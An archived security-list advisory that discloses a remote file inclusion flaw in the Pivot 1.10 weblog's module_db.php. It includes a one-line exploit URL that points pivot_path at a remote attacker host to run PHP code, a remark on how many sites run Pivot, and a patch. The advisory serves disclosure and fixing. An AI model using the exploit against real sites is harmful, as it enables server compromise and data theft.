lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <33107.24.112.89.37.1087246798.squirrel@mail.0x90.org>
From: loofus at 0x90.org (loofus)
Subject: Pivotlog - Remote Code Execution

Pivot 1.10 Soundwave - Remote Code Execution
--------------------------------------------
	loofus - 0x90.org

Greets:
-------
Downbload, nummish, peace, war-cow, rest of 0x90.org.

Description:
------------
 Pivot is a tool to create weblogs, without the need of a database. Pivot is
 easy to setup, easy to maintain and even easier to work with. All data is
 stored using flat files. MySQL or other databases are not required, just
 plain PHP.

Vulnerability:
--------------
 The vulnerability is a remote file inclusion (hmm been seeing to many of
 these lately). Anywas, the vulnerability lies within a class file called
 module_db.php which is accessible individually. By supplying a malicious
 path variable the attack is able to include any file he/she wishes and is
 able to include remote php code allowing local system access as whatever
 user PHP is runs scripts as most likely www-data.

 --- module_db.php ---
 // for now, we'll just use the xml / flat-file module..
 include_once $pivot_path."modules/module_db_xml.php";

 class db {

--- module_db.php ---

No check is done on module_db.php as it is assumed that noone will actually
individually visit this file as it contains a class interface. The idea
behind this is to include this file somewhere else within the code execution
so that $pivot_path is properly set. However if register_globals is set to
on within php.ini the attacker is able to hijack the variable $pivot_path
and point it to somewhere else ("http://xxxxx/includes/module_db_xml.php").

Exploitation:
-------------
http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx

Interesting:
------------
	"Results 1 - 10 of about 28,600 for "Powered by Pivot". (0.78 seconds)"

Fix:
----
--- module_db.php	Wed Feb 11 16:29:04 2004
+++ module_db.phpfix	Fri May 28 22:36:07 2004
@@ -10,6 +10,10 @@
 // Patch to fix remote include - loofus (0x90)
 //
---------------------------------------------------------------------------

+/* Make sure user cannot include remote files */
+if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) ||
		isset($_COOKIE['pivot_path']))
+	die("No remote include for you!\n");
+
	 // for now, we'll just use the xml / flat-file module..
	 include_once $pivot_path."modules/module_db_xml.php";

Download it here: http://0x90.org/~loofus/pivot1.10-soundwave.patch

-- 
Alex "loofus" Buck


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ